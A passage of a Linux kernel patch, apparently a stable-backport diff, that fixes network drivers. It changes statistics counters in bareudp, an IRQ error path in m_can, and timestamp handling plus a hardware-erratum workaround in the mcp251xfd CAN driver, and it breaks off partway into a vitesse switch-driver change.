+index 683203f87ae2b..277493e41b072 100644
+--- a/drivers/net/bareudp.c
++++ b/drivers/net/bareudp.c
+@@ -82,7 +82,7 @@ static int bareudp_udp_encap_recv(struct sock *sk, struct sk_buff *skb)
+ 
+ 		if (skb_copy_bits(skb, BAREUDP_BASE_HLEN, &ipversion,
+ 				  sizeof(ipversion))) {
+-			bareudp->dev->stats.rx_dropped++;
++			DEV_STATS_INC(bareudp->dev, rx_dropped);
+ 			goto drop;
+ 		}
+ 		ipversion >>= 4;
+@@ -92,7 +92,7 @@ static int bareudp_udp_encap_recv(struct sock *sk, struct sk_buff *skb)
+ 		} else if (ipversion == 6 && bareudp->multi_proto_mode) {
+ 			proto = htons(ETH_P_IPV6);
+ 		} else {
+-			bareudp->dev->stats.rx_dropped++;
++			DEV_STATS_INC(bareudp->dev, rx_dropped);
+ 			goto drop;
+ 		}
+ 	} else if (bareudp->ethertype == htons(ETH_P_MPLS_UC)) {
+@@ -106,7 +106,7 @@ static int bareudp_udp_encap_recv(struct sock *sk, struct sk_buff *skb)
+ 				   ipv4_is_multicast(tunnel_hdr->daddr)) {
+ 				proto = htons(ETH_P_MPLS_MC);
+ 			} else {
+-				bareudp->dev->stats.rx_dropped++;
++				DEV_STATS_INC(bareudp->dev, rx_dropped);
+ 				goto drop;
+ 			}
+ 		} else {
+@@ -122,7 +122,7 @@ static int bareudp_udp_encap_recv(struct sock *sk, struct sk_buff *skb)
+ 				   (addr_type & IPV6_ADDR_MULTICAST)) {
+ 				proto = htons(ETH_P_MPLS_MC);
+ 			} else {
+-				bareudp->dev->stats.rx_dropped++;
++				DEV_STATS_INC(bareudp->dev, rx_dropped);
+ 				goto drop;
+ 			}
+ 		}
+@@ -134,12 +134,12 @@ static int bareudp_udp_encap_recv(struct sock *sk, struct sk_buff *skb)
+ 				 proto,
+ 				 !net_eq(bareudp->net,
+ 				 dev_net(bareudp->dev)))) {
+-		bareudp->dev->stats.rx_dropped++;
++		DEV_STATS_INC(bareudp->dev, rx_dropped);
+ 		goto drop;
+ 	}
+ 	tun_dst = udp_tun_rx_dst(skb, family, TUNNEL_KEY, 0, 0);
+ 	if (!tun_dst) {
+-		bareudp->dev->stats.rx_dropped++;
++		DEV_STATS_INC(bareudp->dev, rx_dropped);
+ 		goto drop;
+ 	}
+ 	skb_dst_set(skb, &tun_dst->dst);
+@@ -165,8 +165,8 @@ static int bareudp_udp_encap_recv(struct sock *sk, struct sk_buff *skb)
+ 						     &((struct ipv6hdr *)oiph)->saddr);
+ 		}
+ 		if (err > 1) {
+-			++bareudp->dev->stats.rx_frame_errors;
+-			++bareudp->dev->stats.rx_errors;
++			DEV_STATS_INC(bareudp->dev, rx_frame_errors);
++			DEV_STATS_INC(bareudp->dev, rx_errors);
+ 			goto drop;
+ 		}
+ 	}
+@@ -462,11 +462,11 @@ static netdev_tx_t bareudp_xmit(struct sk_buff *skb, struct net_device *dev)
+ 	dev_kfree_skb(skb);
+ 
+ 	if (err == -ELOOP)
+-		dev->stats.collisions++;
++		DEV_STATS_INC(dev, collisions);
+ 	else if (err == -ENETUNREACH)
+-		dev->stats.tx_carrier_errors++;
++		DEV_STATS_INC(dev, tx_carrier_errors);
+ 
+-	dev->stats.tx_errors++;
++	DEV_STATS_INC(dev, tx_errors);
+ 	return NETDEV_TX_OK;
+ }
+ 
+diff --git a/drivers/net/can/m_can/m_can.c b/drivers/net/can/m_can/m_can.c
+index 2de998b98cb5e..561f25cdad3fb 100644
+--- a/drivers/net/can/m_can/m_can.c
++++ b/drivers/net/can/m_can/m_can.c
+@@ -1815,7 +1815,7 @@ static int m_can_open(struct net_device *dev)
+ 	/* start the m_can controller */
+ 	err = m_can_start(dev);
+ 	if (err)
+-		goto exit_irq_fail;
++		goto exit_start_fail;
+ 
+ 	if (!cdev->is_peripheral)
+ 		napi_enable(&cdev->napi);
+@@ -1824,6 +1824,9 @@ static int m_can_open(struct net_device *dev)
+ 
+ 	return 0;
+ 
++exit_start_fail:
++	if (cdev->is_peripheral || dev->irq)
++		free_irq(dev->irq, dev);
+ exit_irq_fail:
+ 	if (cdev->is_peripheral)
+ 		destroy_workqueue(cdev->tx_wq);
+diff --git a/drivers/net/can/spi/mcp251x.c b/drivers/net/can/spi/mcp251x.c
+index 79c4bab5f7246..8c56f85e87c1a 100644
+--- a/drivers/net/can/spi/mcp251x.c
++++ b/drivers/net/can/spi/mcp251x.c
+@@ -753,7 +753,7 @@ static int mcp251x_hw_wake(struct spi_device *spi)
+ 	int ret;
+ 
+ 	/* Force wakeup interrupt to wake device, but don't execute IST */
+-	disable_irq(spi->irq);
++	disable_irq_nosync(spi->irq);
+ 	mcp251x_write_2regs(spi, CANINTE, CANINTE_WAKIE, CANINTF_WAKIF);
+ 
+ 	/* Wait for oscillator startup timer after wake up */
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c
+index 1665f78abb5c9..a9bafa96e2f92 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c
+@@ -2,7 +2,7 @@
+ //
+ // mcp251xfd - Microchip MCP251xFD Family CAN controller driver
+ //
+-// Copyright (c) 2019, 2020, 2021 Pengutronix,
++// Copyright (c) 2019, 2020, 2021, 2023 Pengutronix,
+ //               Marc Kleine-Budde <kernel@pengutronix.de>
+ //
+ // Based on:
+@@ -867,18 +867,18 @@ static int mcp251xfd_get_berr_counter(const struct net_device *ndev,
+ 
+ static struct sk_buff *
+ mcp251xfd_alloc_can_err_skb(struct mcp251xfd_priv *priv,
+-			    struct can_frame **cf, u32 *timestamp)
++			    struct can_frame **cf, u32 *ts_raw)
+ {
+ 	struct sk_buff *skb;
+ 	int err;
+ 
+-	err = mcp251xfd_get_timestamp(priv, timestamp);
++	err = mcp251xfd_get_timestamp_raw(priv, ts_raw);
+ 	if (err)
+ 		return NULL;
+ 
+ 	skb = alloc_can_err_skb(priv->ndev, cf);
+ 	if (skb)
+-		mcp251xfd_skb_set_timestamp(priv, skb, *timestamp);
++		mcp251xfd_skb_set_timestamp_raw(priv, skb, *ts_raw);
+ 
+ 	return skb;
+ }
+@@ -889,7 +889,7 @@ static int mcp251xfd_handle_rxovif(struct mcp251xfd_priv *priv)
+ 	struct mcp251xfd_rx_ring *ring;
+ 	struct sk_buff *skb;
+ 	struct can_frame *cf;
+-	u32 timestamp, rxovif;
++	u32 ts_raw, rxovif;
+ 	int err, i;
+ 
+ 	stats->rx_over_errors++;
+@@ -924,14 +924,14 @@ static int mcp251xfd_handle_rxovif(struct mcp251xfd_priv *priv)
+ 			return err;
+ 	}
+ 
+-	skb = mcp251xfd_alloc_can_err_skb(priv, &cf, &timestamp);
++	skb = mcp251xfd_alloc_can_err_skb(priv, &cf, &ts_raw);
+ 	if (!skb)
+ 		return 0;
+ 
+ 	cf->can_id |= CAN_ERR_CRTL;
+ 	cf->data[1] = CAN_ERR_CRTL_RX_OVERFLOW;
+ 
+-	err = can_rx_offload_queue_timestamp(&priv->offload, skb, timestamp);
++	err = can_rx_offload_queue_timestamp(&priv->offload, skb, ts_raw);
+ 	if (err)
+ 		stats->rx_fifo_errors++;
+ 
+@@ -948,12 +948,12 @@ static int mcp251xfd_handle_txatif(struct mcp251xfd_priv *priv)
+ static int mcp251xfd_handle_ivmif(struct mcp251xfd_priv *priv)
+ {
+ 	struct net_device_stats *stats = &priv->ndev->stats;
+-	u32 bdiag1, timestamp;
++	u32 bdiag1, ts_raw;
+ 	struct sk_buff *skb;
+ 	struct can_frame *cf = NULL;
+ 	int err;
+ 
+-	err = mcp251xfd_get_timestamp(priv, &timestamp);
++	err = mcp251xfd_get_timestamp_raw(priv, &ts_raw);
+ 	if (err)
+ 		return err;
+ 
+@@ -1035,8 +1035,8 @@ static int mcp251xfd_handle_ivmif(struct mcp251xfd_priv *priv)
+ 	if (!cf)
+ 		return 0;
+ 
+-	mcp251xfd_skb_set_timestamp(priv, skb, timestamp);
+-	err = can_rx_offload_queue_timestamp(&priv->offload, skb, timestamp);
++	mcp251xfd_skb_set_timestamp_raw(priv, skb, ts_raw);
++	err = can_rx_offload_queue_timestamp(&priv->offload, skb, ts_raw);
+ 	if (err)
+ 		stats->rx_fifo_errors++;
+ 
+@@ -1049,7 +1049,7 @@ static int mcp251xfd_handle_cerrif(struct mcp251xfd_priv *priv)
+ 	struct sk_buff *skb;
+ 	struct can_frame *cf = NULL;
+ 	enum can_state new_state, rx_state, tx_state;
+-	u32 trec, timestamp;
++	u32 trec, ts_raw;
+ 	int err;
+ 
+ 	err = regmap_read(priv->map_reg, MCP251XFD_REG_TREC, &trec);
+@@ -1079,7 +1079,7 @@ static int mcp251xfd_handle_cerrif(struct mcp251xfd_priv *priv)
+ 	/* The skb allocation might fail, but can_change_state()
+ 	 * handles cf == NULL.
+ 	 */
+-	skb = mcp251xfd_alloc_can_err_skb(priv, &cf, &timestamp);
++	skb = mcp251xfd_alloc_can_err_skb(priv, &cf, &ts_raw);
+ 	can_change_state(priv->ndev, cf, tx_state, rx_state);
+ 
+ 	if (new_state == CAN_STATE_BUS_OFF) {
+@@ -1110,7 +1110,7 @@ static int mcp251xfd_handle_cerrif(struct mcp251xfd_priv *priv)
+ 		cf->data[7] = bec.rxerr;
+ 	}
+ 
+-	err = can_rx_offload_queue_timestamp(&priv->offload, skb, timestamp);
++	err = can_rx_offload_queue_timestamp(&priv->offload, skb, ts_raw);
+ 	if (err)
+ 		stats->rx_fifo_errors++;
+ 
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-ram.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-ram.c
+index 9e8e82cdba461..61b0d6fa52dd8 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-ram.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-ram.c
+@@ -97,7 +97,16 @@ void can_ram_get_layout(struct can_ram_layout *layout,
+ 	if (ring) {
+ 		u8 num_rx_coalesce = 0, num_tx_coalesce = 0;
+ 
+-		num_rx = can_ram_rounddown_pow_of_two(config, &config->rx, 0, ring->rx_pending);
++		/* If the ring parameters have been configured in
++		 * CAN-CC mode, but and we are in CAN-FD mode now,
++		 * they might be to big. Use the default CAN-FD values
++		 * in this case.
++		 */
++		num_rx = ring->rx_pending;
++		if (num_rx > layout->max_rx)
++			num_rx = layout->default_rx;
++
++		num_rx = can_ram_rounddown_pow_of_two(config, &config->rx, 0, num_rx);
+ 
+ 		/* The ethtool doc says:
+ 		 * To disable coalescing, set usecs = 0 and max_frames = 1.
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-ring.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-ring.c
+index 4d0246a0779a6..0fde8154a649b 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-ring.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-ring.c
+@@ -196,6 +196,7 @@ mcp251xfd_ring_init_rx(struct mcp251xfd_priv *priv, u16 *base, u8 *fifo_nr)
+ 	int i, j;
+ 
+ 	mcp251xfd_for_each_rx_ring(priv, rx_ring, i) {
++		rx_ring->last_valid = timecounter_read(&priv->tc);
+ 		rx_ring->head = 0;
+ 		rx_ring->tail = 0;
+ 		rx_ring->base = *base;
+@@ -458,11 +459,25 @@ int mcp251xfd_ring_alloc(struct mcp251xfd_priv *priv)
+ 
+ 	/* switching from CAN-2.0 to CAN-FD mode or vice versa */
+ 	if (fd_mode != test_bit(MCP251XFD_FLAGS_FD_MODE, priv->flags)) {
++		const struct ethtool_ringparam ring = {
++			.rx_pending = priv->rx_obj_num,
++			.tx_pending = priv->tx->obj_num,
++		};
++		const struct ethtool_coalesce ec = {
++			.rx_coalesce_usecs_irq = priv->rx_coalesce_usecs_irq,
++			.rx_max_coalesced_frames_irq = priv->rx_obj_num_coalesce_irq,
++			.tx_coalesce_usecs_irq = priv->tx_coalesce_usecs_irq,
++			.tx_max_coalesced_frames_irq = priv->tx_obj_num_coalesce_irq,
++		};
+ 		struct can_ram_layout layout;
+ 
+-		can_ram_get_layout(&layout, &mcp251xfd_ram_config, NULL, NULL, fd_mode);
+-		priv->rx_obj_num = layout.default_rx;
+-		tx_ring->obj_num = layout.default_tx;
++		can_ram_get_layout(&layout, &mcp251xfd_ram_config, &ring, &ec, fd_mode);
++
++		priv->rx_obj_num = layout.cur_rx;
++		priv->rx_obj_num_coalesce_irq = layout.rx_coalesce;
++
++		tx_ring->obj_num = layout.cur_tx;
++		priv->tx_obj_num_coalesce_irq = layout.tx_coalesce;
+ 	}
+ 
+ 	if (fd_mode) {
+@@ -499,6 +514,8 @@ int mcp251xfd_ring_alloc(struct mcp251xfd_priv *priv)
+ 		}
+ 
+ 		rx_ring->obj_num = rx_obj_num;
++		rx_ring->obj_num_shift_to_u8 = BITS_PER_TYPE(rx_ring->obj_num_shift_to_u8) -
++			ilog2(rx_obj_num);
+ 		rx_ring->obj_size = rx_obj_size;
+ 		priv->rx[i] = rx_ring;
+ 	}
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-rx.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-rx.c
+index ced8d9c81f8c6..fe897f3e4c12a 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-rx.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-rx.c
+@@ -2,7 +2,7 @@
+ //
+ // mcp251xfd - Microchip MCP251xFD Family CAN controller driver
+ //
+-// Copyright (c) 2019, 2020, 2021 Pengutronix,
++// Copyright (c) 2019, 2020, 2021, 2023 Pengutronix,
+ //               Marc Kleine-Budde <kernel@pengutronix.de>
+ //
+ // Based on:
+@@ -16,23 +16,14 @@
+ 
+ #include "mcp251xfd.h"
+ 
+-static inline int
+-mcp251xfd_rx_head_get_from_chip(const struct mcp251xfd_priv *priv,
+-				const struct mcp251xfd_rx_ring *ring,
+-				u8 *rx_head, bool *fifo_empty)
++static inline bool mcp251xfd_rx_fifo_sta_empty(const u32 fifo_sta)
+ {
+-	u32 fifo_sta;
+-	int err;
+-
+-	err = regmap_read(priv->map_reg, MCP251XFD_REG_FIFOSTA(ring->fifo_nr),
+-			  &fifo_sta);
+-	if (err)
+-		return err;
+-
+-	*rx_head = FIELD_GET(MCP251XFD_REG_FIFOSTA_FIFOCI_MASK, fifo_sta);
+-	*fifo_empty = !(fifo_sta & MCP251XFD_REG_FIFOSTA_TFNRFNIF);
++	return !(fifo_sta & MCP251XFD_REG_FIFOSTA_TFNRFNIF);
++}
+ 
+-	return 0;
++static inline bool mcp251xfd_rx_fifo_sta_full(const u32 fifo_sta)
++{
++	return fifo_sta & MCP251XFD_REG_FIFOSTA_TFERFFIF;
+ }
+ 
+ static inline int
+@@ -80,29 +71,49 @@ mcp251xfd_check_rx_tail(const struct mcp251xfd_priv *priv,
+ }
+ 
+ static int
+-mcp251xfd_rx_ring_update(const struct mcp251xfd_priv *priv,
+-			 struct mcp251xfd_rx_ring *ring)
++mcp251xfd_get_rx_len(const struct mcp251xfd_priv *priv,
++		     const struct mcp251xfd_rx_ring *ring,
++		     u8 *len_p)
+ {
+-	u32 new_head;
+-	u8 chip_rx_head;
+-	bool fifo_empty;
++	const u8 shift = ring->obj_num_shift_to_u8;
++	u8 chip_head, tail, len;
++	u32 fifo_sta;
+ 	int err;
+ 
+-	err = mcp251xfd_rx_head_get_from_chip(priv, ring, &chip_rx_head,
+-					      &fifo_empty);
+-	if (err || fifo_empty)
++	err = regmap_read(priv->map_reg, MCP251XFD_REG_FIFOSTA(ring->fifo_nr),
++			  &fifo_sta);
++	if (err)
++		return err;
++
++	if (mcp251xfd_rx_fifo_sta_empty(fifo_sta)) {
++		*len_p = 0;
++		return 0;
++	}
++
++	if (mcp251xfd_rx_fifo_sta_full(fifo_sta)) {
++		*len_p = ring->obj_num;
++		return 0;
++	}
++
++	chip_head = FIELD_GET(MCP251XFD_REG_FIFOSTA_FIFOCI_MASK, fifo_sta);
++
++	err =  mcp251xfd_check_rx_tail(priv, ring);
++	if (err)
+ 		return err;
++	tail = mcp251xfd_get_rx_tail(ring);
+ 
+-	/* chip_rx_head, is the next RX-Object filled by the HW.
+-	 * The new RX head must be >= the old head.
++	/* First shift to full u8. The subtraction works on signed
++	 * values, that keeps the difference steady around the u8
++	 * overflow. The right shift acts on len, which is an u8.
+ 	 */
+-	new_head = round_down(ring->head, ring->obj_num) + chip_rx_head;
+-	if (new_head <= ring->head)
+-		new_head += ring->obj_num;
++	BUILD_BUG_ON(sizeof(ring->obj_num) != sizeof(chip_head));
++	BUILD_BUG_ON(sizeof(ring->obj_num) != sizeof(tail));
++	BUILD_BUG_ON(sizeof(ring->obj_num) != sizeof(len));
+ 
+-	ring->head = new_head;
++	len = (chip_head << shift) - (tail << shift);
++	*len_p = len >> shift;
+ 
+-	return mcp251xfd_check_rx_tail(priv, ring);
++	return 0;
+ }
+ 
+ static void
+@@ -148,8 +159,6 @@ mcp251xfd_hw_rx_obj_to_skb(const struct mcp251xfd_priv *priv,
+ 
+ 	if (!(hw_rx_obj->flags & MCP251XFD_OBJ_FLAGS_RTR))
+ 		memcpy(cfd->data, hw_rx_obj->data, cfd->len);
+-
+-	mcp251xfd_skb_set_timestamp(priv, skb, hw_rx_obj->ts);
+ }
+ 
+ static int
+@@ -160,8 +169,26 @@ mcp251xfd_handle_rxif_one(struct mcp251xfd_priv *priv,
+ 	struct net_device_stats *stats = &priv->ndev->stats;
+ 	struct sk_buff *skb;
+ 	struct canfd_frame *cfd;
++	u64 timestamp;
+ 	int err;
+ 
++	/* According to mcp2518fd erratum DS80000789E 6. the FIFOCI
++	 * bits of a FIFOSTA register, here the RX FIFO head index
++	 * might be corrupted and we might process past the RX FIFO's
++	 * head into old CAN frames.
++	 *
++	 * Compare the timestamp of currently processed CAN frame with
++	 * last valid frame received. Abort with -EBADMSG if an old
++	 * CAN frame is detected.
++	 */
++	timestamp = timecounter_cyc2time(&priv->tc, hw_rx_obj->ts);
++	if (timestamp <= ring->last_valid) {
++		stats->rx_fifo_errors++;
++
++		return -EBADMSG;
++	}
++	ring->last_valid = timestamp;
++
+ 	if (hw_rx_obj->flags & MCP251XFD_OBJ_FLAGS_FDF)
+ 		skb = alloc_canfd_skb(priv->ndev, &cfd);
+ 	else
+@@ -172,6 +199,7 @@ mcp251xfd_handle_rxif_one(struct mcp251xfd_priv *priv,
+ 		return 0;
+ 	}
+ 
++	mcp251xfd_skb_set_timestamp(skb, timestamp);
+ 	mcp251xfd_hw_rx_obj_to_skb(priv, hw_rx_obj, skb);
+ 	err = can_rx_offload_queue_timestamp(&priv->offload, skb, hw_rx_obj->ts);
+ 	if (err)
+@@ -197,52 +225,81 @@ mcp251xfd_rx_obj_read(const struct mcp251xfd_priv *priv,
+ 	return err;
+ }
+ 
++static int
++mcp251xfd_handle_rxif_ring_uinc(const struct mcp251xfd_priv *priv,
++				struct mcp251xfd_rx_ring *ring,
++				u8 len)
++{
++	int offset;
++	int err;
++
++	if (!len)
++		return 0;
++
++	ring->head += len;
++
++	/* Increment the RX FIFO tail pointer 'len' times in a
++	 * single SPI message.
++	 *
++	 * Note:
++	 * Calculate offset, so that the SPI transfer ends on
++	 * the last message of the uinc_xfer array, which has
++	 * "cs_change == 0", to properly deactivate the chip
++	 * select.
++	 */
++	offset = ARRAY_SIZE(ring->uinc_xfer) - len;
++	err = spi_sync_transfer(priv->spi,
++				ring->uinc_xfer + offset, len);
++	if (err)
++		return err;
++
++	ring->tail += len;
++
++	return 0;
++}
++
+ static int
+ mcp251xfd_handle_rxif_ring(struct mcp251xfd_priv *priv,
+ 			   struct mcp251xfd_rx_ring *ring)
+ {
+ 	struct mcp251xfd_hw_rx_obj_canfd *hw_rx_obj = ring->obj;
+-	u8 rx_tail, len;
++	u8 rx_tail, len, l;
+ 	int err, i;
+ 
+-	err = mcp251xfd_rx_ring_update(priv, ring);
++	err = mcp251xfd_get_rx_len(priv, ring, &len);
+ 	if (err)
+ 		return err;
+ 
+-	while ((len = mcp251xfd_get_rx_linear_len(ring))) {
+-		int offset;
+-
++	while ((l = mcp251xfd_get_rx_linear_len(ring, len))) {
+ 		rx_tail = mcp251xfd_get_rx_tail(ring);
+ 
+ 		err = mcp251xfd_rx_obj_read(priv, ring, hw_rx_obj,
+-					    rx_tail, len);
++					    rx_tail, l);
+ 		if (err)
+ 			return err;
+ 
+-		for (i = 0; i < len; i++) {
++		for (i = 0; i < l; i++) {
+ 			err = mcp251xfd_handle_rxif_one(priv, ring,
+ 							(void *)hw_rx_obj +
+ 							i * ring->obj_size);
+-			if (err)
++
++			/* -EBADMSG means we're affected by mcp2518fd
++			 * erratum DS80000789E 6., i.e. the timestamp
++			 * in the RX object is older that the last
++			 * valid received CAN frame. Don't process any
++			 * further and mark processed frames as good.
++			 */
++			if (err == -EBADMSG)
++				return mcp251xfd_handle_rxif_ring_uinc(priv, ring, i);
++			else if (err)
+ 				return err;
+ 		}
+ 
+-		/* Increment the RX FIFO tail pointer 'len' times in a
+-		 * single SPI message.
+-		 *
+-		 * Note:
+-		 * Calculate offset, so that the SPI transfer ends on
+-		 * the last message of the uinc_xfer array, which has
+-		 * "cs_change == 0", to properly deactivate the chip
+-		 * select.
+-		 */
+-		offset = ARRAY_SIZE(ring->uinc_xfer) - len;
+-		err = spi_sync_transfer(priv->spi,
+-					ring->uinc_xfer + offset, len);
++		err = mcp251xfd_handle_rxif_ring_uinc(priv, ring, l);
+ 		if (err)
+ 			return err;
+ 
+-		ring->tail += len;
++		len -= l;
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-tef.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-tef.c
+index 902eb767426d1..8f39730f3122e 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-tef.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-tef.c
+@@ -97,7 +97,7 @@ mcp251xfd_handle_tefif_one(struct mcp251xfd_priv *priv,
+ 	tef_tail = mcp251xfd_get_tef_tail(priv);
+ 	skb = priv->can.echo_skb[tef_tail];
+ 	if (skb)
+-		mcp251xfd_skb_set_timestamp(priv, skb, hw_tef_obj->ts);
++		mcp251xfd_skb_set_timestamp_raw(priv, skb, hw_tef_obj->ts);
+ 	stats->tx_bytes +=
+ 		can_rx_offload_get_echo_skb(&priv->offload,
+ 					    tef_tail, hw_tef_obj->ts,
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-timestamp.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-timestamp.c
+index 712e091869870..1db99aabe85c5 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-timestamp.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-timestamp.c
+@@ -2,7 +2,7 @@
+ //
+ // mcp251xfd - Microchip MCP251xFD Family CAN controller driver
+ //
+-// Copyright (c) 2021 Pengutronix,
++// Copyright (c) 2021, 2023 Pengutronix,
+ //               Marc Kleine-Budde <kernel@pengutronix.de>
+ //
+ 
+@@ -11,20 +11,20 @@
+ 
+ #include "mcp251xfd.h"
+ 
+-static u64 mcp251xfd_timestamp_read(const struct cyclecounter *cc)
++static u64 mcp251xfd_timestamp_raw_read(const struct cyclecounter *cc)
+ {
+ 	const struct mcp251xfd_priv *priv;
+-	u32 timestamp = 0;
++	u32 ts_raw = 0;
+ 	int err;
+ 
+ 	priv = container_of(cc, struct mcp251xfd_priv, cc);
+-	err = mcp251xfd_get_timestamp(priv, &timestamp);
++	err = mcp251xfd_get_timestamp_raw(priv, &ts_raw);
+ 	if (err)
+ 		netdev_err(priv->ndev,
+ 			   "Error %d while reading timestamp. HW timestamps may be inaccurate.",
+ 			   err);
+ 
+-	return timestamp;
++	return ts_raw;
+ }
+ 
+ static void mcp251xfd_timestamp_work(struct work_struct *work)
+@@ -39,21 +39,11 @@ static void mcp251xfd_timestamp_work(struct work_struct *work)
+ 			      MCP251XFD_TIMESTAMP_WORK_DELAY_SEC * HZ);
+ }
+ 
+-void mcp251xfd_skb_set_timestamp(const struct mcp251xfd_priv *priv,
+-				 struct sk_buff *skb, u32 timestamp)
+-{
+-	struct skb_shared_hwtstamps *hwtstamps = skb_hwtstamps(skb);
+-	u64 ns;
+-
+-	ns = timecounter_cyc2time(&priv->tc, timestamp);
+-	hwtstamps->hwtstamp = ns_to_ktime(ns);
+-}
+-
+ void mcp251xfd_timestamp_init(struct mcp251xfd_priv *priv)
+ {
+ 	struct cyclecounter *cc = &priv->cc;
+ 
+-	cc->read = mcp251xfd_timestamp_read;
++	cc->read = mcp251xfd_timestamp_raw_read;
+ 	cc->mask = CYCLECOUNTER_MASK(32);
+ 	cc->shift = 1;
+ 	cc->mult = clocksource_hz2mult(priv->can.clock.freq, cc->shift);
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd.h b/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
+index 78d12dda08a05..c07300443c6a3 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
+@@ -2,7 +2,7 @@
+  *
+  * mcp251xfd - Microchip MCP251xFD Family CAN controller driver
+  *
+- * Copyright (c) 2019, 2020, 2021 Pengutronix,
++ * Copyright (c) 2019, 2020, 2021, 2023 Pengutronix,
+  *               Marc Kleine-Budde <kernel@pengutronix.de>
+  * Copyright (c) 2019 Martin Sperl <kernel@martin.sperl.org>
+  */
+@@ -549,10 +549,14 @@ struct mcp251xfd_rx_ring {
+ 	unsigned int head;
+ 	unsigned int tail;
+ 
++	/* timestamp of the last valid received CAN frame */
++	u64 last_valid;
++
+ 	u16 base;
+ 	u8 nr;
+ 	u8 fifo_nr;
+ 	u8 obj_num;
++	u8 obj_num_shift_to_u8;
+ 	u8 obj_size;
+ 
+ 	union mcp251xfd_write_reg_buf irq_enable_buf;
+@@ -793,10 +797,27 @@ mcp251xfd_spi_cmd_write(const struct mcp251xfd_priv *priv,
+ 	return data;
+ }
+ 
+-static inline int mcp251xfd_get_timestamp(const struct mcp251xfd_priv *priv,
+-					  u32 *timestamp)
++static inline int mcp251xfd_get_timestamp_raw(const struct mcp251xfd_priv *priv,
++					      u32 *ts_raw)
++{
++	return regmap_read(priv->map_reg, MCP251XFD_REG_TBC, ts_raw);
++}
++
++static inline void mcp251xfd_skb_set_timestamp(struct sk_buff *skb, u64 ns)
++{
++	struct skb_shared_hwtstamps *hwtstamps = skb_hwtstamps(skb);
++
++	hwtstamps->hwtstamp = ns_to_ktime(ns);
++}
++
++static inline
++void mcp251xfd_skb_set_timestamp_raw(const struct mcp251xfd_priv *priv,
++				     struct sk_buff *skb, u32 ts_raw)
+ {
+-	return regmap_read(priv->map_reg, MCP251XFD_REG_TBC, timestamp);
++	u64 ns;
++
++	ns = timecounter_cyc2time(&priv->tc, ts_raw);
++	mcp251xfd_skb_set_timestamp(skb, ns);
+ }
+ 
+ static inline u16 mcp251xfd_get_tef_obj_addr(u8 n)
+@@ -889,18 +910,9 @@ static inline u8 mcp251xfd_get_rx_tail(const struct mcp251xfd_rx_ring *ring)
+ 	return ring->tail & (ring->obj_num - 1);
+ }
+ 
+-static inline u8 mcp251xfd_get_rx_len(const struct mcp251xfd_rx_ring *ring)
+-{
+-	return ring->head - ring->tail;
+-}
+-
+ static inline u8
+-mcp251xfd_get_rx_linear_len(const struct mcp251xfd_rx_ring *ring)
++mcp251xfd_get_rx_linear_len(const struct mcp251xfd_rx_ring *ring, u8 len)
+ {
+-	u8 len;
+-
+-	len = mcp251xfd_get_rx_len(ring);
+-
+ 	return min_t(u8, len, ring->obj_num - mcp251xfd_get_rx_tail(ring));
+ }
+ 
+@@ -926,8 +938,6 @@ void mcp251xfd_ring_free(struct mcp251xfd_priv *priv);
+ int mcp251xfd_ring_alloc(struct mcp251xfd_priv *priv);
+ int mcp251xfd_handle_rxif(struct mcp251xfd_priv *priv);
+ int mcp251xfd_handle_tefif(struct mcp251xfd_priv *priv);
+-void mcp251xfd_skb_set_timestamp(const struct mcp251xfd_priv *priv,
+-				 struct sk_buff *skb, u32 timestamp);
+ void mcp251xfd_timestamp_init(struct mcp251xfd_priv *priv);
+ void mcp251xfd_timestamp_stop(struct mcp251xfd_priv *priv);
+ 
+diff --git a/drivers/net/dsa/vitesse-vsc73xx-core.c b/drivers/net/dsa/vitesse-vsc73xx-core.c
+index c8e9ca5d5c284..de444d201e0f8 100644
+--- a/drivers/net/dsa/vitesse-vsc73xx-core.c
++++ b/drivers/net/dsa/vitesse-vsc73xx-core.c
+@@ -35,7 +35,7 @@
+ #define VSC73XX_BLOCK_ANALYZER	0x2 /* Only subblock 0 */
+ #define VSC73XX_BLOCK_MII	0x3 /* Subblocks 0 and 1 */
+ #define VSC73XX_BLOCK_MEMINIT	0x3 /* Only subblock 2 */
+-#define VSC73XX_BLOCK_CAPTURE	0x4 /* Only subblock 2 */
++#define VSC73XX_BLOCK_CAPTURE	0x4 /* Subblocks 0-4, 6, 7 */
+ #define VSC73XX_BLOCK_ARBITER	0x5 /* Only subblock 0 */
+ #define VSC73XX_BLOCK_SYSTEM	0x7 /* Only subblock 0 */
+ 
+@@ -371,13 +371,19 @@ int vsc73xx_is_addr_valid(u8 block, u8 subblock)
+ 		break;
+ 
+ 	case VSC73XX_BLOCK_MII:
+-	case VSC73XX_BLOCK_CAPTURE:
+ 	case VSC73XX_BLOCK_ARBITER:
+ 		switch (subblock) {
+ 		case 0 ... 1:
+ 			return 1;
+ 		}
+ 		break;
++	case VSC73XX_BLOCK_CAPTURE:
++		switch (subblock) {
